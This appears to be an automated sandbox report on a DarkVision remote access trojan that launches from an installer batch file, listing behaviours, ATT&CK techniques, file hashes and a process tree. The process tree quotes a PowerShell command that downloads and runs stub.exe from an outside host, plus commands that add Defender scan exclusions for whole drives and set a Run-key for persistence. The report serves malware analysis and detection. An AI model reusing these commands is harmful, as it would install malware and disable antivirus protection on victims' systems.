darkvision | a2e8bc403a5538730879d16b4a98686cf5562b822a431d40fffa7ab7f923bafd

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-12-2024 21:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sushi/Installer.bat
Size

65B
MD5

9234614a70c0c02829fbad081a57eae5
SHA1

4058c1a07df74ec328ac5a81e7fd13c60072aea7
SHA256

4c87cf865dac4712ce5c86bc0ede65060f5b4058c3c48bcf145b54eed2ecd9dd
SHA512

3c036df40c6f94c7fdea5b7b80bffbe8d9a16cfdc632e447955c5fe4167be5c9954d5f33e81afc47189078210fba9245fbcbbc7f0378f1efcb3e4cb6ccd54801

Score

10^/10

darkvision discovery execution persistence rat

Malware Config

Signatures

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Blocklisted process makes network request 2 IoCs

flow	pid	Process
22	1992	powershell.exe
23	1992	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1592	powershell.exe
1868	powershell.exe
4580	powershell.exe
2836	powershell.exe
1992	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	svhost.exe

Executes dropped EXE 3 IoCs

pid	Process
1412	account.tmp
2180	stub.exe
4428	svhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{AB1F3E47-AEF1-400E-A108-233A046C3A34} = "C:\\ProgramData\\Resources\\svhost.exe {69CF428B-78D4-49A9-B9AB-B631EBDB1D7A}"	svhost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\NSRS\unins000.dat	account.tmp
File created	C:\Program Files (x86)\NSRS\is-BL13V.tmp	account.tmp
File opened for modification	C:\Program Files (x86)\NSRS\unins000.dat	account.tmp

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	account.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	account.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1592	powershell.exe
1592	powershell.exe
4580	powershell.exe
4580	powershell.exe
1992	powershell.exe
1992	powershell.exe
2836	powershell.exe
2836	powershell.exe
1868	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1412	account.tmp

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 5072 wrote to memory of 3092	5072	cmd.exe	83
PID 5072 wrote to memory of 3092	5072	cmd.exe	83
PID 3092 wrote to memory of 3236	3092	cmd.exe	85
PID 3092 wrote to memory of 3236	3092	cmd.exe	85
PID 3092 wrote to memory of 3236	3092	cmd.exe	85
PID 3236 wrote to memory of 1412	3236	account.exe	86
PID 3236 wrote to memory of 1412	3236	account.exe	86
PID 3236 wrote to memory of 1412	3236	account.exe	86
PID 1412 wrote to memory of 1592	1412	account.tmp	88
PID 1412 wrote to memory of 1592	1412	account.tmp	88
PID 1412 wrote to memory of 1592	1412	account.tmp	88
PID 1592 wrote to memory of 4580	1592	powershell.exe	90
PID 1592 wrote to memory of 4580	1592	powershell.exe	90
PID 1592 wrote to memory of 4580	1592	powershell.exe	90
PID 3092 wrote to memory of 1992	3092	cmd.exe	95
PID 3092 wrote to memory of 1992	3092	cmd.exe	95
PID 3092 wrote to memory of 2180	3092	cmd.exe	97
PID 3092 wrote to memory of 2180	3092	cmd.exe	97
PID 2180 wrote to memory of 3200	2180	stub.exe	98
PID 2180 wrote to memory of 3200	2180	stub.exe	98
PID 2180 wrote to memory of 4428	2180	stub.exe	100
PID 2180 wrote to memory of 4428	2180	stub.exe	100
PID 3200 wrote to memory of 2836	3200	cmd.exe	101
PID 3200 wrote to memory of 2836	3200	cmd.exe	101
PID 4428 wrote to memory of 3440	4428	svhost.exe	102
PID 4428 wrote to memory of 3440	4428	svhost.exe	102
PID 3440 wrote to memory of 1868	3440	cmd.exe	104
PID 3440 wrote to memory of 1868	3440	cmd.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sushi\Installer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Windows\system32\cmd.exe
  cmd /c "classes\avatar.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe
    "C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\is-G05FG.tmp\account.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-G05FG.tmp\account.tmp" /SL5="$802A0,845894,845824,C:\Users\Admin\AppData\Local\Temp\sushi\Classes\account.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\is-K5O0B.tmp\1.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1592
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri http://sushifactory.uk/stub.exe -OutFile C:\Users\Admin\AppData\Local\Temp\stub.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- - C:\Users\Admin\AppData\Local\Temp\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\stub.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
  - - C:\ProgramData\Resources\svhost.exe
      "C:\ProgramData\Resources\svhost.exe" {574245A9-B969-4088-926C-5F5F4438445F}
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4428
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3440
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Program Files (x86)','C:','C:\Users\Admin\AppData\Local\Temp','C:\Users\Admin\AppData\Roaming'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
49e7d5f2a296b59afec08bc314bed998

SHA1
7f898bf195ffd46ce2d19fad0ce33155f6e47f5f

SHA256
394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe

SHA512
f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9a8fa91d86242afd75056cc0d9b6aac1

SHA1
1d1e73e490c13ca09fb7fa97864f0beb1c376cf3

SHA256
ddecaf6b006d384e9c69e46126a9fa47d177e467f1bf6aa47e4d53e1ff06abdc

SHA512
03ef981dbacb5b20b5ef32a9a594e38d862c1fa27204e0223b7c42d611d1c2657b8a59763beb6c7516cf717c21543c648ead89bcad0b4d7a26675cf86ea1b1c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4cb59d549e8c5d613ea4b7524088528a

SHA1
5bdfb9bc4920177a9e5d4b9c93df65383353ab22

SHA256
a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a

SHA512
a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
c1e6b57ab7d30f497ccdc1fa1f7853b4

SHA1
0c608353d3ff00e76d1cafc5d2be32bbda7dfc85

SHA256
dc5d7d04b2c561ceeab376927cdedeed551a6e82bd8c597f470c55085f6300e8

SHA512
9a247cc894d2cfe03e71f1f3dfd9a4706a863d350f8adc19cf8237895e6bf664c7a7f417360e282888330377979b7cbfa4cc6b3268a1d1a043d63854bd819183

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4sjqgu5i.iha.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-G05FG.tmp\account.tmp

Filesize
3.2MB

MD5
035e56973a32721ed623f2ecd605571e

SHA1
cb6969652265370eaca3dcf88f6e743105510e30

SHA256
f56e4fd4dd3e20a106395f525f4a2e2c07416c62ab022215c8dc4fef2b519729

SHA512
bd16344bb2957bead325acbb6a23b029ad61b7de4d1baf159ecf2ace3f6f7d0231e3c6264defa6c2d99ac9b894f1001eeceee0d0c3cf45c071b9b917da1c46fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-K5O0B.tmp\1.ps1

Filesize
59B

MD5
d541ca594d1f7f4e7e410dab77d5b9a1

SHA1
4ee8b70929e9ba694a1cf4bbd167e267df1612aa

SHA256
e58ece60621ee71f33fc205dec39d17be6a2956fb144b66d9c0ffefd70f7cc17

SHA512
53c0806bbd7d9819f5b8f7fe3905977f06597004b6f4f2eafc980504e9a8f7a3d3ad34fe207a227f1ca5009a2199a03c77a834620ed6ae9e8d96754d1affd7ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\stub.exe

Filesize
453KB

MD5
daad12d6bdbd2c84670dde98d4578cac

SHA1
af9621dce5b7b42ff4407ae2917ee10b977d9fa6

SHA256
3f2eb38466e631cbd44b5223a3ee41e56490d114fee83aa2ce075b076551c5cd

SHA512
b48daf7b10f27ce2748eb81d254f6265d58f612c73f54e6290cc56cc24f3ddb84372a802deffbf85ef7246d365454a3bad096f25ccdd7edbe39dce74145c8908

Download Submit
memory/1412-73-0x0000000000FC0000-0x0000000001303000-memory.dmp

Filesize
3.3MB

Download
memory/1412-75-0x0000000000FC0000-0x0000000001303000-memory.dmp

Filesize
3.3MB

Download
memory/1412-6-0x0000000001690000-0x0000000001691000-memory.dmp

Filesize
4KB

Download
memory/1412-43-0x0000000001690000-0x0000000001691000-memory.dmp

Filesize
4KB

Download
memory/1592-20-0x0000000006330000-0x0000000006396000-memory.dmp

Filesize
408KB

Download
memory/1592-18-0x0000000005990000-0x00000000059B2000-memory.dmp

Filesize
136KB

Download
memory/1592-31-0x0000000006960000-0x000000000697E000-memory.dmp

Filesize
120KB

Download
memory/1592-30-0x00000000063A0000-0x00000000066F4000-memory.dmp

Filesize
3.3MB

Download
memory/1592-19-0x00000000062C0000-0x0000000006326000-memory.dmp

Filesize
408KB

Download
memory/1592-14-0x0000000073FAE000-0x0000000073FAF000-memory.dmp

Filesize
4KB

Download
memory/1592-15-0x0000000003350000-0x0000000003386000-memory.dmp

Filesize
216KB

Download
memory/1592-16-0x0000000073FA0000-0x0000000074750000-memory.dmp

Filesize
7.7MB

Download
memory/1592-32-0x0000000006980000-0x00000000069CC000-memory.dmp

Filesize
304KB

Download
memory/1592-71-0x0000000073FA0000-0x0000000074750000-memory.dmp

Filesize
7.7MB

Download
memory/1592-17-0x0000000005C20000-0x0000000006248000-memory.dmp

Filesize
6.2MB

Download
memory/1992-77-0x0000020091650000-0x0000020091672000-memory.dmp

Filesize
136KB

Download
memory/3236-2-0x0000000000BF1000-0x0000000000C99000-memory.dmp

Filesize
672KB

Download
memory/3236-72-0x0000000000BF0000-0x0000000000CCC000-memory.dmp

Filesize
880KB

Download
memory/3236-76-0x0000000000BF0000-0x0000000000CCC000-memory.dmp

Filesize
880KB

Download
memory/3236-0-0x0000000000BF0000-0x0000000000CCC000-memory.dmp

Filesize
880KB

Download
memory/4580-57-0x0000000007FA0000-0x000000000861A000-memory.dmp

Filesize
6.5MB

Download
memory/4580-65-0x0000000007C80000-0x0000000007C88000-memory.dmp

Filesize
32KB

Download
memory/4580-64-0x0000000007CA0000-0x0000000007CBA000-memory.dmp

Filesize
104KB

Download
memory/4580-63-0x0000000007BA0000-0x0000000007BB4000-memory.dmp

Filesize
80KB

Download
memory/4580-62-0x0000000007B90000-0x0000000007B9E000-memory.dmp

Filesize
56KB

Download
memory/4580-61-0x0000000007B60000-0x0000000007B71000-memory.dmp

Filesize
68KB

Download
memory/4580-60-0x0000000007BE0000-0x0000000007C76000-memory.dmp

Filesize
600KB

Download
memory/4580-59-0x00000000079D0000-0x00000000079DA000-memory.dmp

Filesize
40KB

Download
memory/4580-58-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/4580-56-0x0000000007830000-0x00000000078D3000-memory.dmp

Filesize
652KB

Download
memory/4580-55-0x0000000007810000-0x000000000782E000-memory.dmp

Filesize
120KB

Download
memory/4580-44-0x0000000006B90000-0x0000000006BC2000-memory.dmp

Filesize
200KB

Download
memory/4580-45-0x0000000070400000-0x000000007044C000-memory.dmp

Filesize
304KB

Download